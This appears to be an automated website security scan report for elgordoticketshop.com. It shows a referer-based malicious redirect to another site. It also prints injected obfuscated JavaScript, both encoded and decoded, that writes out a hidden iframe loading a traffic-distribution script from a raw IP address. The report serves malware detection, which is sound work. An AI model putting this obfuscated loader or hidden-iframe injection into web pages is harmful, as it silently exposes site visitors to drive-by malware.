Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://elgordoticketshop.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: elgordoticketshop.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 23:35:27 GMT Location: http://bismarckurbanharvest.org/bismanuu_migrate/misc/ui/images/kee.php Server: WebServerX Content-Length: 330 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://elgordoticketshop.com/ | 200 OK Content-Length: 787 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
function v51865a8c1645e(v51865a8c164ac){ function v51865a8c164f4 () {return 16;} return(parseInt(v51865a8c164ac,v51865a8c164f4()));}function v51865a8c165ad(v51865a8c165ef){ function v51865a8c16698 () {return 2;} var v51865a8c16630='';for(v51865a8c16671=0; v51865a8c16671<v51865a8c165ef.length; v51865a8c16671+=v51865a8c16698()){ v51865a8c16630+=(String.fromCharCode(v51865a8c1645e(v51865a8c165ef.substr(v51865a8c16671, v51865a8c16698()))));}return v51865a8c16630;} document.write(v51865a8c165ad('3C696672616D65206E616D653D2764636639333935666161326527207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353035206865696768743D333034207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));
Decoded script:
<iframe name='dcf9395faa2e' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=505 height=304 style='display:none'></iframe>
Antivirus reports:
http://elgordoticketshop.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 23:35:28 GMT Location: http://bismarckurbanharvest.org/bismanuu_migrate/misc/ui/images/kee.php Server: WebServerX Content-Length: 330 Content-Type: text/html; charset=iso-8859-1 | clean |
http://bismarckurbanharvest.org/bismanuu_migrate/misc/ui/images/kee.php | 404 Not Found Content-Length: 7639 Content-Type: text/html | clean |
http://bismarckurbanharvest.org/components/js/modernizr.js | 200 OK Content-Length: 12904 Content-Type: application/x-javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://elgordoticketshop.com/components/js/tao_gallery.js | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 23:35:31 GMT Location: http://bismarckurbanharvest.org/bismanuu_migrate/misc/ui/images/kee.php Server: WebServerX Content-Length: 330 Content-Type: text/html; charset=iso-8859-1 | clean |
http://bismarckurbanharvest.org/test404page.js | 404 Not Found Content-Length: 175 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elgordoticketshop.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://elgordoticketshop.com/
Result: elgordoticketshop.com is not infected or malware details are not published yet.